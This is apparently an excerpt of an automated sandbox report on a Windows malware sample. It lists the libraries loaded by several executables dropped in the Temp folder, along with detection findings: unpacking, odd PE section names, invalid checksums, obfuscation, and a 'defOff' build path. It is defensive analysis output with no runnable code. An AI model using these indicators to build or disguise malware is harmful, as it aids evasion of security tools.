Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2949632 > 1048576
Source: file.exe Static PE information: Raw size of czpsekko is bigger than: 0x100000 < 0x2a6c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000003.2371701533.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505556141.0000000000A92000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Unpacked PE file: 3.2.ST44OD0PMG8MCMYJRN4.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Unpacked PE file: 4.2.9NWW1UIUAOJA8NFOZHWEDA.exe.4a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.790000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wehliqok:EW;xquxcvvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Unpacked PE file: 6.2.M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.a90000.0.unpack :EW;.rsrc:W;.idata :W;pnhiajhq:EW;lwmvjhen:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Unpacked PE file: 11.2.26e226f915.exe.830000.0.unpack :EW;.rsrc :W;.idata :W;czpsekko:EW;spvyrroo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;czpsekko:EW;spvyrroo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Unpacked PE file: 12.2.ef2532c0b1.exe.40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Unpacked PE file: 33.2.ef2532c0b1.exe.40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;letztgfz:EW;rrfcshya:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: random[1].exe.9.dr Static PE information: real checksum: 0x2d063f should be: 0x2d27d6
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: num.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: ef2532c0b1.exe.9.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: random[1].exe0.9.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: file.exe Static PE information: real checksum: 0x2d063f should be: 0x2d27d6
Source: 26e226f915.exe.9.dr Static PE information: real checksum: 0x2d063f should be: 0x2d27d6
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1ce631 should be: 0x1cb159
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: real checksum: 0x2c1234 should be: 0x2bb468
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: real checksum: 0x1c56a1 should be: 0x1cad2c
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: real checksum: 0x2c1234 should be: 0x2bb468
Source: num[1].exe.9.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: czpsekko
Source: file.exe Static PE information: section name: spvyrroo
Source: file.exe Static PE information: section name: .taggant
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: .idata
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name:
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: wehliqok
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: xquxcvvg
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: .taggant
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .rsrc
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .idata
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name:
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: letztgfz
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: rrfcshya
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: .taggant
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name:
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: .idata
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: pnhiajhq
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: lwmvjhen
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: wehliqok
Source: skotes.exe.3.dr Static PE information: section name: xquxcvvg
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .rsrc
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: random[1].exe.9.dr Static PE information: section name: czpsekko
Source: random[1].exe.9.dr Static PE information: section name: spvyrroo
Source: random[1].exe.9.dr Static PE information: section name: .taggant
Source: 26e226f915.exe.9.dr Static PE information: section name:
Source: 26e226f915.exe.9.dr Static PE information: section name: .rsrc
Source: 26e226f915.exe.9.dr Static PE information: section name: .idata
Source: 26e226f915.exe.9.dr Static PE information: section name: czpsekko
Source: 26e226f915.exe.9.dr Static PE information: section name: spvyrroo
Source: 26e226f915.exe.9.dr Static PE information: section name: .taggant
Source: random[1].exe0.9.dr Static PE information: section name:
Source: random[1].exe0.9.dr Static PE information: section name: .rsrc
Source: random[1].exe0.9.dr Static PE information: section name: .idata
Source: random[1].exe0.9.dr Static PE information: section name:
Source: random[1].exe0.9.dr Static PE information: section name: letztgfz
Source: random[1].exe0.9.dr Static PE information: section name: rrfcshya
Source: random[1].exe0.9.dr Static PE information: section name: .taggant
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .rsrc
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .idata
Source: ef2532c0b1.exe.9.dr Static PE information: section name:
Source: ef2532c0b1.exe.9.dr Static PE information: section name: letztgfz
Source: ef2532c0b1.exe.9.dr Static PE information: section name: rrfcshya
Source: ef2532c0b1.exe.9.dr Static PE information: section name: .taggant
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: .idata
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name:
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: wehliqok
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: xquxcvvg
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: .taggant
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .rsrc
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .idata
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: letztgfz
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: rrfcshya
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .taggant
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name:
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: .idata
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: pnhiajhq
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: lwmvjhen
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: .taggant
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: .idata
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: wehliqok
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: xquxcvvg
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B0F8A4 push eax; ret 0_3_00B0F8A5
